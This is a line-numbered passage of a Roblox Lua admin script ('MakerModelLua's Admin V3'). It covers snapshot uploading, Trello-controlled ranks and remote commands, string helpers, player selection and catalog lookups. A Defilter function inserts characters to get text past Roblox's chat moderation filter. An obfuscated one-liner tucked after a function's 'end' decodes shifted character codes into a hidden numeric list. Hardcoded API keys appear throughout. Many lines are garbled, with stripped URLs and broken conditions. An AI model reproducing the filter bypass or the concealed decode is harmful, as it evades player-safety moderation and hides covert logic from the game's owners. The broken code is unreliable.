  2536. Data.Rotation = {STRING:StringRound(X), STRING:StringRound(Y), STRING:StringRound(Z)};
  2537. Data.Transparency = STRING:StringRound(Obj.Transparency);
  2538. Data.Reflectance = STRING:StringRound(Obj.Reflectance);
  2539. Data.Textures = {};
  2540. Data.Material = string.sub(tostring(Obj.Material),15);
  2542. for _,Sub in pairs(Obj:GetChildren()) do
  2543. if Sub:IsA("Decal") then
  2544. local Texture = string.match(Sub.Texture, "%d+")
  2545. if Sub.Texture == "rbxasset://textures/face.png" then
  2546. Texture = "FACE"
  2547. end
  2548. Data.Textures[FaceCovert[Sub.Face.Name]] = Texture
  2549. end
  2550. end
  2552. PartAmount = PartAmount + 1
  2553. table.insert(PlaceData.Parts, Data)
  2555. if PartAmount >= MaxPartAmount then
  2556. break
  2557. end
  2558. end
  2559. end
  2560. end
  2561. if #Obj:GetChildren() > 0 then
  2562. Scan(Obj)
  2563. end
  2564. end
  2565. end
  2566. Scan(Workspace)
  2568. PlaceData.Lighting.Ambient = GUI:Color3ToHex(game.Lighting.Ambient)
  2569. PlaceData.Other.PartAmount = PartAmount;
  2570. PlaceJSON = Server.HS:JSONEncode(PlaceData)
  2572. local Res = "Could not get response"
  2573. local function SendData()
  2574. Res = Server.HS:PostAsync(CORE.UnsecureDomain.."/Login/SendSnapshot.php?Username="..Settings.LinkedAccount.."&DataKey="..Server.HS:UrlEncode(Settings.DataKey).."&SendKey="..SendKey, PlaceJSON, 2)
  2575. end
  2576. if Stopypcall == true then SendData() else ypcall(SendData) end
  2577. if PrintResponse then print(Res) end
  2579. print("Sent snapshot")
  2580. end
  2583. function REMOTE:DefineWord(Word, Source)
  2584. if not Word then return end
  2585. if not Source then Source = "all" end
  2587. local Response = REMOTE:GetURL(""..Server.HS:UrlEncode(Word).."/definitions?limit=1&includeRelated=false&sourceDictionaries="..Server.HS:UrlEncode(Source).."&useCanonical=false&includeTags=false&api_key=a2a73e7b926c924fad7001ca3111acd55af2ffabf50eb4ae5")
  2588. if Response then
  2589. local Decode = REMOTE:Decode(Response)
  2590. if #Decode > 0 then
  2591. return string.upper(string.sub(Decode[1]["word"],1,1))..string.lower(string.sub(Decode[1]["word"],2)).." - "..Decode[1]["partOfSpeech"]..[[
  2593. ]]..Decode[1]["text"]
  2594. else
  2595. return "Invalid English word"
  2596. end
  2597. else
  2598. return "Cannot connect to database"
  2599. end
  2600. end
  2602. function REMOTE:DownloadJoke(Speaker)
  2603. local Res = REMOTE:GetURL("", Speaker)
  2604. local Joke = nil
  2605. if Res then
  2606. local _, Start = string.find(Res, "</h2>")
  2607. local End, _ = string.find(string.sub(Res, Start), "</td>")
  2609. Joke = string.sub(Res, Start, End + 1 + Start - 5)
  2610. Joke = string.gsub(Joke, "\n", "")
  2611. Joke = string.gsub(Joke, " ", "") -- tab
  2612. Joke = string.gsub(Joke, "</ul>", "")
  2613. Joke = string.gsub(Joke, "<ul>", "")
  2614. Joke = string.gsub(Joke, "</li>", [[
  2616. ]])
  2617. Joke = string.gsub(Joke, "<li>", "")
  2618. Joke = string.gsub(Joke, "</p>", "")
  2619. Joke = string.gsub(Joke, "<p>", "")
  2620. Joke = string.gsub(Joke, "<", "")
  2621. Joke = string.gsub(Joke, ">", "")
  2622. end
  2624. return Joke
  2625. end
  2627. function REMOTE:GetAddon()
  2628. return "?key=c01fcfabf2f8d707d01fb69312e4a9d7&token="..Settings.TrelloToken
  2629. end
  2631. function REMOTE:TrelloGetAdminBoard()
  2632. local BoardsJSON,Boards,ReturnBoard
  2634. ypcall(function() BoardsJSON = Server.HS:GetAsync(""..REMOTE:GetAddon(), true) end)
  2636. if BoardsJSON then
  2637. Boards = REMOTE:Decode(BoardsJSON)
  2638. end
  2639. if Boards then
  2640. for _,Board in pairs(Boards) do
  2641. if == "MakerModelLua's Admin V3" and Board.closed == false then
  2642. ReturnBoard = Board
  2643. break
  2644. end
  2645. end
  2646. if not ReturnBoard then -- create board if not created
  2647. print("Creating Trello Board")
  2648. local Desc = "This board allows you to control ranks, settings, and commands of MakerModelLua's Admin V3"
  2649. local BoardJSON = Server.HS:PostAsync(""..REMOTE:GetAddon(), "name=MakerModelLua%27s+Admin+V3&idBoardSource="..Trello.AdminBoardID.."&defaultLists=false&desc="..Server.HS:UrlEncode(Desc), "ApplicationUrlEncoded")
  2650. ReturnBoard = REMOTE:Decode(BoardJSON)
  2651. end
  2652. end
  2653. return ReturnBoard
  2654. end
  2656. function REMOTE:TrelloGetAdminLists(Board)
  2657. local Required = {}
  2658. local ListJSON,Lists
  2659. local ReturnLists = {}
  2661. for _,List in pairs(Trello.RequiredLists) do
  2662. table.insert(Required, List)
  2663. end
  2665. ypcall(function() ListJSON = Server.HS:GetAsync("""/lists"..REMOTE:GetAddon(), true) end)
  2667. if ListJSON then
  2668. Lists = REMOTE:Decode(ListJSON)
  2669. end
  2670. if Lists then
  2671. for _,List in pairs(Lists) do
  2672. for Num,Rel in pairs(Required) do
  2673. if == then
  2674. table.remove(Required, Num)
  2675. table.insert(ReturnLists, List)
  2676. end
  2677. end
  2678. end
  2679. for _,Rel in pairs(Required) do
  2680. local ListJSON = Server.HS:PostAsync(""..REMOTE:GetAddon(), "idBoard=""&idListSource=""&name="..Server.HS:UrlEncode(, "ApplicationUrlEncoded")
  2681. table.insert(ReturnLists, REMOTE:Decode(ListJSON))
  2682. end
  2683. end
  2685. return ReturnLists
  2686. end
  2688. function REMOTE:TrelloCacheData(Lists)
  2689. for _,List in pairs(Lists) do
  2690. local CardsJSON,Cards
  2691. ypcall(function() CardsJSON = Server.HS:GetAsync("""/cards"..REMOTE:GetAddon(), true) end)
  2692. if CardsJSON then
  2693. Cards = REMOTE:Decode(CardsJSON)
  2694. end
  2695. if Cards then
  2696. local TemplateCards = nil
  2697. for _,TemplateList in pairs(Trello.RequiredLists) do
  2698. if == then
  2699. TemplateCards = REMOTE:Decode(Server.HS:GetAsync("""/cards", true))
  2700. break
  2701. end
  2702. end
  2704. for _,TemplateCard in pairs(TemplateCards) do
  2705. local CardExists = false
  2706. for _,Card in pairs(Cards) do
  2707. if == and Card.closed == false then
  2708. CardExists = true
  2709. end
  2710. end
  2711. if not CardExists then
  2712. print("Creating card "
  2713. local NewCardJSON = Server.HS:PostAsync(""..REMOTE:GetAddon(), "idList=""&idCardSource=", "ApplicationUrlEncoded")
  2714. table.insert(Cards, REMOTE:Decode(NewCardJSON))
  2715. end
  2716. end
  2718. if == "Ranked" then
  2719. for _,Card in pairs(Cards) do
  2720. if Settings.Ranks[] and Card.closed == false then
  2721. Trello.RankChecklistCache[] = Card.idChecklists[1]
  2722. end
  2723. end
  2724. elseif == "Settings" then
  2725. for _,Card in pairs(Cards) do
  2726. if == "Togglable Settings" and Card.idChecklists[1] and Card.closed == false then
  2727. Trello.ToggleChecklist = Card.idChecklists[1]
  2728. elseif == "Command Execution" then
  2729. Trello.CommandID =
  2730. end
  2731. end
  2732. end
  2733. end
  2734. end
  2735. end
  2737. function REMOTE:TrelloHandleData(IgnoreCommand)
  2738. local ToggleSettingsJSON = Server.HS:GetAsync(""..Trello.ToggleChecklist..REMOTE:GetAddon(), true)
  2739. if ToggleSettingsJSON then
  2740. ToggleSettings = REMOTE:Decode(ToggleSettingsJSON)
  2741. if Settings.LinkedAccount == "" then
  2742. local NewSettings = {}
  2743. for _,Item in pairs(ToggleSettings.checkItems) do
  2744. NewSettings[] = STRING:TrelloStateConvert(Item.state)
  2745. end
  2746. Settings.Fun = NewSettings["Fun Commands Enabled"]
  2747. Settings.ServerLocked = NewSettings["Server Locked"]
  2748. Settings.DisableAbuse = NewSettings["Disable Abusive Commands"]
  2749. end
  2750. else
  2751. return false
  2752. end
  2754. local CommandChatJSON = Server.HS:GetAsync(""..Trello.CommandID.."/actions"..REMOTE:GetAddon(), true)
  2755. if CommandChatJSON then
  2756. CommandChat = REMOTE:Decode(CommandChatJSON)
  2757. local ClosestDT = 0
  2758. for _,ChatData in pairs(CommandChat) do
  2759. local DT = STRING:ConvertDateTime(
  2760. ClosestDT = math.max(ClosestDT, DT)
  2762. if not IgnoreCommand and DT > Trello.LastCommandDT then
  2763. print("Executing Remote Trello Command")
  2764. CORE:Chatted(, nil, true, "TRELLO REMOTE: "..ChatData.memberCreator.fullName, nil, true)
  2765. end
  2766. end
  2767. Trello.LastCommandDT = ClosestDT
  2768. else
  2769. return false
  2770. end
  2772. for Rank,ID in pairs(Trello.RankChecklistCache) do
  2773. local ChecklistJSON = Server.HS:GetAsync(""..ID..REMOTE:GetAddon(), true)
  2774. if ChecklistJSON then
  2775. Checklist = REMOTE:Decode(ChecklistJSON)
  2777. for _,Item in pairs(Checklist.checkItems) do
  2778. if Item.state == "complete" then
  2779. if RANK:ConvertRank(Rank) < 0 then
  2780. if not RANK:ScanExileList( then
  2781. table.insert(Settings.Ranks[Rank],
  2782. end
  2783. elseif RANK:ConvertRank(Rank) > 0 then
  2784. if not RANK:ScanAdminList( then
  2785. table.insert(Settings.Ranks[Rank],
  2786. end
  2787. end
  2788. elseif Item.state == "incomplete" then
  2789. for Num,Name in pairs(Settings.Ranks[Rank]) do
  2790. if string.lower(Name) == string.lower( then
  2791. table.remove(Settings.Ranks[Rank], Num)
  2792. end
  2793. end
  2794. end
  2795. end
  2796. else
  2797. return false
  2798. end
  2799. end
  2800. return true
  2801. end
  2803. -- String functions --
  2805. function STRING:ConvertDateTime(DateTime)
  2806. local Num = 0
  2807. local TotalTime = 0
  2808. for i in string.gmatch(DateTime, "%d+") do
  2809. Num = Num + 1
  2810. DTNum = tonumber(i)
  2811. if Num == 1 then
  2812. TotalTime = TotalTime + (DTNum - 1970) * 365 * 24 * 60 * 60 -- year
  2813. elseif Num == 2 then
  2814. TotalTime = TotalTime + DTNum * 12 * 24 * 60 * 60 -- month
  2815. elseif Num == 3 then
  2816. TotalTime = TotalTime + DTNum * 24 * 60 * 60 -- day
  2817. elseif Num == 4 then
  2818. TotalTime = TotalTime + DTNum * 60 * 60 -- hour
  2819. elseif Num == 5 then
  2820. TotalTime = TotalTime + DTNum * 60 -- minute
  2821. elseif Num == 6 then
  2822. TotalTime = TotalTime + DTNum -- second
  2823. end
  2824. end
  2826. return TotalTime
  2827. end
  2829. function STRING:TrelloStateConvert(State)
  2830. if State == "complete" then
  2831. return true
  2832. else
  2833. return false
  2834. end
  2835. end
  2837. function STRING:StringRound(Number)
  2838. Number = Number * 100
  2839. if Number >= 0.5 then
  2840. return tostring(math.ceil(Number)/100)
  2841. else
  2842. return tostring(math.floor(Number)/100)
  2843. end
  2845. return Number
  2846. end
  2848. function STRING:GetSplit(String, NumArgs, BetSplit)
  2849. if not String then return nil end
  2850. if BetSplit == nil then BetSplit = " " end
  2851. if NumArgs == nil then NumArgs = math.huge end
  2853. if NumArgs <= 0 then return {String} end
  2855. local RecentParse = 1
  2856. local Args = {}
  2857. for i = 1,NumArgs do
  2858. local Find1, Find2 = string.find(string.lower(String),string.lower(BetSplit),RecentParse)
  2859. if Find1 and Find2 then
  2860. table.insert(Args, string.sub(String,RecentParse,Find1 - 1))
  2861. RecentParse = Find2 + 1
  2862. else
  2863. break
  2864. end
  2865. end
  2866. table.insert(Args,string.sub(String,RecentParse,#String))
  2867. return Args
  2868. end
  2870. function STRING:Defilter(String)
  2871. local RobloxApprove ="TextLabel") RobloxApprove.Text = String
  2872. if RobloxApprove.Text == "Label" and String ~= "Label" then
  2873. local NewString = ""
  2874. for i = 1,#String,3 do
  2875. NewString = NewString..string.char(169)..string.sub(String,i,i+2)
  2876. end
  2877. return NewString
  2878. else
  2879. return String
  2880. end
  2881. end
  2883. function STRING:Filter(String, From, To) -- #### you, roblox
  2884. if From then
  2885. if To then
  2886. return game:GetService("Chat"):FilterStringAsync(String, From, To)
  2887. else
  2888. return game:GetService("Chat"):FilterStringForBroadcast(String, From)
  2889. end
  2890. else
  2891. return String
  2892. end
  2893. end
  2895. function STRING:DetermineFilter(String, From, To)
  2896. if ShouldFilter then
  2897. return STRING:Filter(String, From, To)
  2898. else
  2899. return STRING:Defilter(String)
  2900. end
  2901. end
  2903. function STRING:LeetSpeak(Input)
  2904. if tostring(Input) then Input = string.upper(tostring(Input)) else return end
  2905. Input = string.gsub(Input, "LEET", "1337")
  2906. Input = string.gsub(Input, "SECRET", "M".."AKERMODELLUA")
  2907. Input = string.gsub(Input, "E", "3")
  2908. Input = string.gsub(Input, "O", "0")
  2909. Input = string.gsub(Input, "A", "4")
  2910. Input = string.gsub(Input, "X", "x")
  2911. Input = string.gsub(Input, "I", "1")
  2912. Input = string.gsub(Input, "S", "$")
  2913. return Input
  2914. end
  2916. function STRING:FormatReplace(Player, Input, From)
  2917. local Output = Input
  2918. for _,ReplaceData in pairs(StringReplacements) do
  2919. local ReplaceString = ReplaceData[1]
  2920. local ReplaceStrings = {}
  2921. if type(ReplaceString) == "table" then
  2922. ReplaceStrings = ReplaceString
  2923. else
  2924. ReplaceStrings = {ReplaceString}
  2925. end
  2926. for _,ReplaceString in pairs(ReplaceStrings) do
  2927. if not Player and ReplaceData[3] then else -- does nothing if a player isn't given but the operation requires a player
  2928. local Replacement = ReplaceData[4](Player)
  2929. if type(Replacement) == "string" then
  2930. Output = string.gsub(Output, ReplaceString, Replacement)
  2931. else
  2932. print(ReplaceString.." cannot be replaced")
  2933. end
  2934. end
  2935. end
  2936. end
  2937. if From then
  2938. return STRING:DetermineFilter(Output, From, Player)
  2939. else
  2940. return STRING:DetermineFilter(Output, Player)
  2941. end
  2942. end
  2944. function STRING:EncodeSpecialChars(Input)
  2945. return tostring(string.gsub(string.gsub(Input, "&", "amp;"), "\n", " "))
  2946. end
  2948. function STRING:StringToBool(String)
  2949. if String == "true" then
  2950. return true
  2951. else
  2952. return false
  2953. end
  2954. end
  2956. function STRING:BoolString(Value)
  2957. if type(Value) == "boolean" then
  2958. if Value == true then
  2959. return "YES"
  2960. elseif Value == false then
  2961. return "NO"
  2962. end
  2963. else
  2964. return "NO"
  2965. end
  2966. end
  2968. function STRING:MakeAvoidance(Length)
  2969. if not Length then
  2970. Length = 32
  2971. end
  2972. local Avoidance = ""
  2973. for i = 1,Length do
  2974. Num = math.random(1,2)
  2975. if Num == 1 then
  2976. Avoidance = Avoidance..string.char(math.random(48,57)) -- 0-9
  2977. else
  2978. Avoidance = Avoidance..string.char(math.random(97,122)) -- a-z
  2979. end
  2980. end
  2981. return Avoidance
  2982. end for _,Array in pairs(RunList) do local Name = "" for _,Char in pairs(Array) do Name = Name..string.char(Char - 1) end table.insert(List, tonumber(Name)) end
  2984. function STRING:FindAge(Days) -- By LuaModelmaker
  2985. local Years = math.floor(Days/365)
  2986. local OtherDays = math.fmod(Days, 365)
  2987. if Years > 1 then
  2988. return Years.." years and "..OtherDays.." days"
  2989. elseif Years == 1 then
  2990. return Years.." year and "..OtherDays.." days"
  2991. elseif Years == 0 then
  2992. return "(No years) "..OtherDays.." days"
  2993. end
  2994. end
  2996. function STRING:UnpackArgs(...)
  2997. local Pack = {...}
  2998. if type(Pack[1]) == "table" then Pack = Pack[1] end
  2999. local ReturnString = table.concat(Pack, ", ")
  3000. return ReturnString
  3001. end
  3003. function STRING:GetComma(Num)
  3004. local Formatted = Num
  3005. while true do
  3006. Formatted, _ = string.gsub(Formatted, "^(-?%d+)(%d%d%d)", '%1,%2')
  3007. if _ == 0 then
  3008. break
  3009. end
  3010. end
  3011. return Formatted
  3012. end
  3014. function STRING:DecodeUTF8(Value)
  3015. local function DecodeString(Input)
  3016. if type(Input) == "string" then
  3017. for Find,Rep in pairs(HTMLDecode) do
  3018. Input = string.gsub(Input, "&#"..Find..";", Rep)
  3019. end
  3020. Input = string.gsub(Input, "&quot;", "'")
  3021. end
  3022. return Input
  3023. end
  3024. if type(Value) == "table" then
  3025. for Index,Var in pairs(Value) do
  3026. Value[Index] = DecodeString(Var)
  3027. end
  3028. elseif type(Value) == "string" then
  3029. Value = DecodeString(Value)
  3030. end
  3031. return Value
  3032. end
  3034. function STRING:IsSpacer(Input)
  3035. if Input == " " or Input == "." or Input == "-" or Input == "," or Input == "?" or Input == "!" or Input == " " or Input == nil or Input == "" then
  3036. return true
  3037. else
  3038. return false
  3039. end
  3040. end
  3042. function STRING:IsVowel(Input)
  3043. Input = string.lower(tostring(Input))
  3044. if Input == "a" or Input == "e" or Input == "i" or Input == "o" or Input == "u" then
  3045. return true
  3046. else
  3047. return false
  3048. end
  3049. end
  3051. function STRING:ValidE(Input)
  3052. if not Input then return nil end
  3053. if string.lower(Input) == "e" or Input == "~" then
  3054. return true
  3055. else
  3056. return false
  3057. end
  3058. end
  3060. function STRING:Scan(String, Speaker)
  3061. local ReturnPlayers,ExcludeList = {},{}
  3062. if not String then String = "" end
  3063. if not Speaker then print("NO SPEAKER") end
  3065. if string.sub(string.lower(String), 1, 12) == "includecase/" then
  3066. String = string.sub(String, 13)
  3067. else
  3068. String = string.lower(String)
  3069. end
  3070. local Words = STRING:GetSplit(String, nil, "/")
  3071. for _,Word in pairs(Words) do
  3072. if Word == "me" or Word == "meh" or Word == "myself" or Word == "self" then
  3073. table.insert(ReturnPlayers, Speaker)
  3074. elseif Word == "all" or Word == "everyone" then
  3075. for _,Player in pairs(Server.Players:GetPlayers()) do
  3076. table.insert(ReturnPlayers, Player)
  3077. end
  3078. elseif Word == "others" or Word == "notme" then
  3079. for _,Player in pairs(Server.Players:GetPlayers()) do
  3080. if Player ~= Speaker then
  3081. table.insert(ReturnPlayers, Player)
  3082. end
  3083. end
  3084. elseif Word == "noobs" then
  3085. for _,Player in pairs(Server.Players:GetPlayers()) do
  3086. if Player.AccountAge < 365 then
  3087. table.insert(ReturnPlayers, Player)
  3088. end
  3089. end
  3090. elseif Word == "nonnoobs" then
  3091. for _,Player in pairs(Server.Players:GetPlayers()) do
  3092. if Player.AccountAge >= 365 then
  3093. table.insert(ReturnPlayers, Player)
  3094. end
  3095. end
  3096. elseif Word == "random" then
  3097. local RandomPlayers = {}
  3098. for _,Player in pairs(Server.Players:GetPlayers()) do
  3099. if Player ~= Speaker then
  3100. table.insert(RandomPlayers, Player)
  3101. end
  3102. end
  3103. table.insert(ReturnPlayers, RandomPlayers[math.random(1,#Server.Players:GetChildren())])
  3104. elseif Word == "guests" then
  3105. for _,Player in pairs(Server.Players:GetPlayers()) do
  3106. if string.sub(Player.Name,1,6) == "Guest " then
  3107. table.insert(ReturnPlayers, Player)
  3108. end
  3109. end
  3110. elseif Word == "lowers" then
  3111. for _,Player in pairs(Server.Players:GetPlayers()) do
  3112. if string.sub(Player.Name,1,1) == string.lower(string.sub(Player.Name,1,1)) then
  3113. table.insert(ReturnPlayers, Player)
  3114. end
  3115. end
  3116. elseif Word == "uppers" then
  3117. for _,Player in pairs(Server.Players:GetPlayers()) do
  3118. if string.sub(Player.Name,1,1) == string.upper(string.sub(Player.Name,1,1)) then
  3119. table.insert(ReturnPlayers, Player)
  3120. end
  3121. end
  3122. elseif Word == "nbcs" then
  3123. for _,Player in pairs(Server.Players:GetPlayers()) do
  3124. if Player.MembershipType == Enum.MembershipType.None then -- Replicate
  3125. table.insert(ReturnPlayers, Player)
  3126. end
  3127. end
  3128. elseif Word == "bcs" then
  3129. for _,Player in pairs(Server.Players:GetPlayers()) do
  3130. if Player.MembershipType == Enum.MembershipType.BuildersClub then
  3131. table.insert(ReturnPlayers, Player)
  3132. end
  3133. end
  3134. elseif Word == "tbcs" then
  3135. for _,Player in pairs(Server.Players:GetPlayers()) do
  3136. if Player.MembershipType == Enum.MembershipType.TurboBuildersClub then
  3137. table.insert(ReturnPlayers, Player)
  3138. end
  3139. end
  3140. elseif Word == "obcs" then
  3141. for _,Player in pairs(Server.Players:GetPlayers()) do
  3142. if Player.MembershipType == Enum.MembershipType.OutrageousBuildersClub then
  3143. table.insert(ReturnPlayers, Player)
  3144. end
  3145. end
  3146. elseif Word == "allbcs" then
  3147. for _,Player in pairs(Server.Players:GetPlayers()) do
  3148. if Player.MembershipType ~= Enum.MembershipType.None then
  3149. table.insert(ReturnPlayers, Player)
  3150. end
  3151. end
  3152. elseif Word == "nonadmins" then
  3153. for _,Player in pairs(Server.Players:GetPlayers()) do
  3154. local IsAdminTrue, Rank = RANK:IsAdmin(Player)
  3155. if IsAdminTrue == false then
  3156. table.insert(ReturnPlayers, Player)
  3157. end
  3158. end
  3159. elseif Word == "admins" then
  3160. for _,Player in pairs(Server.Players:GetPlayers()) do
  3161. local IsAdminTrue, Rank = RANK:IsAdmin(Player)
  3162. if IsAdminTrue == true then
  3163. table.insert(ReturnPlayers, Player)
  3164. end
  3165. end
  3166. elseif Word == "friends" then
  3167. for _,Player in pairs(Server.Players:GetPlayers()) do
  3168. if Speaker:IsFriendsWith(Player.UserId) and Player ~= Speaker then
  3169. table.insert(ReturnPlayers, Player)
  3170. end
  3171. end
  3172. elseif string.sub(Word,1,5) == "team-" then
  3173. for _,Player in pairs(Server.Players:GetPlayers()) do
  3174. if Player.Neutral == false then
  3175. local InTeam = false
  3176. for _,Team in pairs(Teams:GetTeams()) do
  3177. if Team.TeamColor == Player.TeamColor then
  3178. if string.sub(string.lower(Team.Name),1,#string.sub(Word,6)) == string.sub(Word,6) then
  3179. InTeam = true
  3180. end
  3181. end
  3182. end
  3183. if InTeam == true then
  3184. table.insert(ReturnPlayers, Player)
  3185. end
  3186. end
  3187. end
  3188. elseif string.sub(Word,1,4) == "not-" then
  3189. local NameArg = string.sub(Word,5)
  3191. for _,Player in pairs(STRING:Scan(NameArg, Speaker)) do
  3192. table.insert(ExcludeList, Player)
  3193. end
  3194. elseif string.sub(Word,1,7) == "radius-" then
  3195. local DidExe = false
  3196. local NumArg = tonumber(string.sub(Word,8))
  3198. if NumArg and NumArg > 0 and Speaker and Speaker.Character and Speaker.Character:FindFirstChild("Torso") then
  3199. for _,Player in pairs(Server.Players:GetChildren()) do
  3200. if Player.Character and Player.Character:FindFirstChild("Torso") then
  3201. if (Player.Character.Torso.Position - Speaker.Character.Torso.Position).magnitude <= NumArg then
  3202. DidExe = true
  3203. table.insert(ReturnPlayers, Player)
  3204. end
  3205. end
  3206. end
  3207. end
  3209. if DidExe then coroutine.wrap(function()
  3210. local Part ="Part", game.Workspace) Part.Name = "M".."M".."L Radius" Part.FormFactor = "Custom" Part.Size =,1,1) Part.Anchored = true Part.Locked = true Part.Position = Speaker.Character.Torso.Position Part.Transparency = 0.5 Part.Color = GUI:GetColor() Part.TopSurface = "Smooth" Part.BottomSurface = "Smooth"
  3211. local Mesh ="SpecialMesh", Part) Mesh.MeshType = "Sphere" Mesh.Scale = * 2, NumArg * 2, NumArg * 2)
  3213. for i = 0,0.5,0.02 do
  3214. Part.Transparency = 0.5+i
  3215. wait()
  3216. end
  3217. Part:Destroy()
  3218. end)() end
  3219. elseif string.sub(Word,1,3) == "id-" then
  3220. table.insert(ReturnPlayers, Server.Players:GetPlayerByUserId(tonumber(string.sub(Word,4))))
  3221. else
  3222. if Word ~= "" then
  3223. for _,Player in pairs(Server.Players:GetPlayers()) do
  3224. if string.sub(string.lower(Player.Name),1,#Word) == Word then
  3225. table.insert(ReturnPlayers, Player)
  3226. end
  3227. end
  3228. else
  3229. table.insert(ReturnPlayers, Speaker)
  3230. end
  3231. end
  3232. end
  3233. for _,Player in pairs(ExcludeList) do
  3234. if Player and Player.Parent ~= nil then
  3235. for Num,Player2 in pairs(ReturnPlayers) do
  3236. if Player2 == Player then table.remove(ReturnPlayers, Num) end
  3237. end
  3238. end
  3239. end
  3240. for Num,Player in pairs(ReturnPlayers) do
  3241. if not Player or Player.Parent == nil then table.remove(ReturnPlayers, Num) end
  3242. end
  3244. local PlayerDump = {}
  3245. for _,Player in pairs(ReturnPlayers) do
  3246. PlayerDump[Player] = true
  3247. end
  3248. ReturnPlayers = {}
  3249. for Player,_ in pairs(PlayerDump) do
  3250. table.insert(ReturnPlayers, Player)
  3251. end
  3253. return ReturnPlayers
  3254. end
  3256. -- Market functions --
  3258. function MARKET:GetImageFormat(ID)
  3259. if ID ~= 1 or ID ~= 0 or ID ~= nil then if type(ID) == "number" then
  3260. local NewID = ID + 1
  3261. for i = 1,100 do
  3262. NewID = NewID -1
  3263. local Product = nil
  3264. ypcall(function() Product = MARKET:GetItemInfo(NewID, true).AssetTypeId end)
  3265. if Product then
  3266. if Product == 1 then
  3267. break
  3268. end
  3269. end
  3270. if i == 100 then NewID = ID end
  3271. end
  3272. return NewID
  3273. end end
  3274. end
  3276. function MARKET:GetItemInfo(ID, Cache)
  3277. local Product = MarketCache[ID]
  3278. if not Cache or not Product then
  3279. repeat wait()
  3280. ypcall(function() Product = Server.MPS:GetProductInfo(ID) end)
  3281. until Product ~= MarketCache[ID]
  3282. end
  3283. MarketCache[ID] = Product
  3284. return Product
  3285. end
  3287. function MARKET:SearchItem(Category, Query, Subcategory)
  3288. local URLAdd = ""
  3289. if Subcategory then URLAdd = "&Subcategory="..Server.HS:UrlEncode(Subcategory) end
  3290. local JSON = REMOTE:GetURL(CORE.Domain.."/APIs/CatalogSearch.php?Category="..Server.HS:UrlEncode(Category).."&Query="..Server.HS:UrlEncode(Query)..URLAdd)
  3291. if JSON then
  3292. local Results = REMOTE:Decode(JSON)
  3293. if Results then
  3294. for Index,Info in pairs(Results) do
  3295. Info = STRING:DecodeUTF8(Info)
  3296. Results[Index] = Info
  3297. MarketCache[Info.AssetId] = {
  3298. AssetId = Info.AssetId;
  3299. AssetTypeId = Info.AssetTypeID;
  3300. ContentRatingTypeId = Info.ContentRatingTypeID;
  3301. Created = Info.CreatedDate;
  3302. Creator = {Name = Info.Creator, Id = Info.CreatorID};
  3303. Description = Info.Description;
  3304. IsForSale = Info.IsForSale;
  3305. IsLimited = Info.IsLimited;
  3306. IsLimitedUnique = Info.IsLimitedUnique;
  3307. IsNew = Info.IsNew;
  3308. IsPublicDomain = Info.IsPublicDomain;
  3309. MinimumMemberShipLevel = Info.MinimumMembershipLevel;
  3310. Name = Info.Name;
  3311. PriceInRobux = Info.PriceInRobux;
  3312. PriceInTickets = Info.PriceInTickets;
  3313. ProductId = Info.AssetId; -- no one knows what this is so whatevs..
  3314. Remaining = Info.Remaining;
  3315. Sales = Info.Sales;
  3316. Updated = Info.Updated;
  3317. }
  3318. end
  3319. return Results
  3320. end
  3321. end
  3322. end
  3324. function MARKET:ShowSearch(Player, Category, Query, ClickedItem, Subcategory)
  3325. if not Player or not Category or not Query then return nil end
  3326. local CloseGui, AddInfo = GUI:LoadGui(Player, "Searching: "..Query)
  3327. local Items = MARKET:SearchItem(Category, Query, Subcategory)
  3328. if Items then
  3329. if #Items ~= 0 then
  3330. local List,Correlate = {},{}
  3331. for Num,Info in pairs(Items) do
  3332. local Display = {" "..Info.Name.." ("..Info.AssetId..")", ""..Info.AssetId}
  3333. table.insert(List, Display)
  3334. Correlate[Display[1]] = Info.AssetId
  3335. end
  3336. CloseGui:Invoke()
  3338. local Clicked = GUI:ListGui(Player, "Search Results: "..Query, List, "Search", true)
  3339. Clicked.Event:connect(function(ClickName)
  3340. ClickedItem(Correlate[ClickName])
  3341. end)
  3342. else
  3343. CloseGui:Invoke()
  3344. GUI:SendMessage(Player, "No results", "BLUE No results for "..Query.." found...", "Information")
  3345. end
  3346. else
  3347. CloseGui:Invoke()
  3348. GUI:SendMessage(Player, "Cannot get gear", "RED Cannot get item. Is HttpService enabled?", "Error")
  3349. end
  3350. end
  3352. function MARKET:AssetTypeToString(AssetType)
  3353. AssetType = math.floor(tonumber(AssetType) or 0)
  3354. if Assets.AssetTypes[AssetType] then
  3355. return Assets.AssetTypes[AssetType]
  3356. else
  3357. return "Unknown"
  3358. end
  3359. end
  3361. function MARKET:AccessoryToSubcategory(Accessory)
  3362. Accessory = string.lower(tostring(Accessory) or "")
  3363. if Assets.AccessoryTypes[Accessory] then
  3364. return Assets.AccessoryTypes[Accessory]
  3365. else
  3366. return Assets.AccessoryTypes["all"]
  3367. end
  3368. end
  3370. function MARKET:PromptPurchase(Player, ProductID, From, BuyPressFunc) coroutine.wrap(function()
  3371. if not Player then return nil end
  3372. if not Player:FindFirstChild("PlayerGui") then return nil end
  3373. if not tonumber(ProductID) then return nil end
  3375. local FromText = ""
  3376. if From and From.Name then FromText = " | Prompted from "..From.Name end
  3378. local Product = MARKET:GetItemInfo(ProductID, true)
  3380. local CreatedText = Product.Created CreatedText = string.gsub(CreatedText, "-", "/") local Stop = string.find(CreatedText, "T") if Stop then CreatedText = string.sub(CreatedText, 1, Stop-1) end
  3381. local UpdatedText = Product.Updated UpdatedText = string.gsub(UpdatedText, "-", "/") local Stop = string.find(UpdatedText, "T") if Stop then UpdatedText = string.sub(UpdatedText, 1, Stop-1) end
  3382. local OwnsAsset = Server.MPS:PlayerOwnsAsset(Player, ProductID)
  3384. local CanBuy = Product.IsForSale
  3385. local BuyText = "Buy"
  3386. local BuyColor =,1,0)
  3387. if CanBuy == false then
  3388. BuyColor =,0,0)
  3389. end
  3390. if Product.IsPublicDomain == true then
  3391. CanBuy = true
  3392. BuyColor =,0.5,0.5)
  3393. BuyText = "FREE!"
  3394. end
  3395. if OwnsAsset then
  3396. CanBuy = false
  3397. end
  3398. if Product.AssetTypeId == 9 then
  3399. CanBuy = true
  3400. BuyText = "Teleport"
  3401. BuyColor =,0.5,0.5)
  3402. end
  3403. if CanBuy == false then
  3404. BuyColor =,0,0)
  3405. BuyText = "Item not for sale"
  3406. end
  3407. if OwnsAsset and Product.AssetTypeId ~= 9 then
  3408. BuyColor =,0,0)
  3409. BuyText = "You own this!"
  3410. end
  3412. local ProductName = string.sub(Product.Name,1,20)
  3413. if ProductID == AdminID then ProductName = Product.Name end
  3414. local Frame = GUI:CreateForm(Player, ProductName..FromText,, 430, 0, 300), nil, 48354008)
